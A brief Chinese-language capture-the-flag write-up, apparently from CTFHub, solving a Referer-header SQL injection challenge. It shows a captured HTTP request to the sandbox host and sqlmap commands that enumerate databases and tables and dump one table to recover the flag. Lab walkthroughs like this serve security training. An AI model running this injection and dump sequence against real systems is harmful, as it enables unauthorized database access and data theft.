考点
sql refer注入
过程分析
hackbar发送refer
然后发送repeater抓包
GET / HTTP/1.1
Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10080
Connection: close
Referer: http://challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10080/
Upgrade-Insecure-Requests: 1
Referer:1
把左边 也就是以上信息粘贴到txt里 放到sqlmap目录下
python2 sqlmap.py -r "123.txt" -p referer --level 5 --dbs
python2 sqlmap.py -r "123.txt" -p referer --level 5 -D sqli --tables
python2 sqlmap.py -r "123.txt" -p referer --level 5 -D sqli -T jhrmwuuevc --columns --dump
还是和别的一样的流程 得到表名
jhrmwuuevc
然后爆表 得到flag